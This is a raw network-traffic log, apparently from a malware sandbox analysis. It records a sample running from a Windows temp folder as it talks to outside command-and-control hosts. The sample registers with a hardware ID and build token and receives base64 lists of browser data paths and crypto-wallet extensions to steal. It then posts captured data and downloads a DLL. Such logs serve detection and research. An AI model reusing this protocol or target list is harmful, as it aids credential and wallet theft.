                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                            Cache-Control: no-cache
                                                            Date: Mon, 27 May 2024 13:24:11 GMT
                                                            Content-Length: 35672
                                                            Connection: close
                                                            Set-Cookie: sessionid=59cf56a4d66635d77522f3b7; Path=/; Secure; SameSite=None
                                                            Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.8 | 53086 | 188.114.96.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:10 UTC | 291 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 569527
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:24:13 UTC | 810 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:24:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=nfbkbpsdp5p3fqvob7njhtv817; expires=Fri, 20-Sep-2024 07:10:52 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNKhkKH%2Fb7KaO6rmG%2BsPkKbAin8vElp9wQh2GjNWMCFlhSPqKeqYuFRY229xIl%2BPM8ZHDFZj8MhZg2EEdpCjAPZleRMFUtJ469jOcP3fkQgYRrirnk2zOWFtrdUsb2MeEe0DYPA8qaCAp30%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a652e129ce5e68-EWR
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.8 | 53087 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:12 UTC | 184 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:13 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.8 | 53088 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:13 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 279
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:13 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 45 42 44 37 30 39 38 33 31 32 32 30 34 30 34 30 39 34 30 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d
                                                            Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="hwid"8EEBD70983122040409402-a33c7340-61ca-11ee-8c18-806e6f6e6963------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------
                                                            2024-05-27 13:24:14 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:14 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 3a1|1|1|1|40ccf8a0634bafd489cb1bfaaca1e051|1|1|1|1|1|50000|10


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.8 | 53089 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:15 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAEC
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JJDBFCAEBFIJJKFHDAECCont
                                                            2024-05-27 13:24:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:15 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                            Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.8 | 53091 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:16 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAK
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 331
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:16 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JDGIIJJDHDGCGDHIJDAKCont
                                                            2024-05-27 13:24:17 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:17 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:17 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                            Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.8 | 53094 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:18 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 332
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:18 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GIIDBGDAFHJDHIDGDGIICont
                                                            2024-05-27 13:24:18 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:18 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.8 | 53097 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:19 UTC | 277 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECF
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 5329
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:19 UTC | 5329 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 46 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------KJEGCFBGDHJJJJJKJECFContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KJEGCFBGDHJJJJJKJECFCont
                                                            2024-05-27 13:24:20 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.8 | 53098 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:21 UTC | 192 | OUT | GET /sqls.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:21 UTC | 248 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:21 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2459136
                                                            Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                            Connection: close
                                                            ETag: "6650696d-258600"
                                                            Accept-Ranges: bytes


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.8 | 53099 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:24 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHC
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 829
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:24 UTC | 829 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------AECAKJJECAEGCBGDHDHCCont
                                                            2024-05-27 13:24:25 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:25 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.8 | 53100 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:27 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIE
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Content-Length: 437
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:27 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 30 63 63 66 38 61 30 36 33 34 62 61 66 64 34 38 39 63 62 31 62 66 61 61 63 61 31 65 30 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74
                                                            Data Ascii: ------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="token"40ccf8a0634bafd489cb1bfaaca1e051------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HIDBFCBGDBKKECBFCGIECont
                                                            2024-05-27 13:24:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-05-27 13:24:28 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2ok0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.2.8 | 53101 | 37.27.34.12 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:29 UTC | 276 | OUT | POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
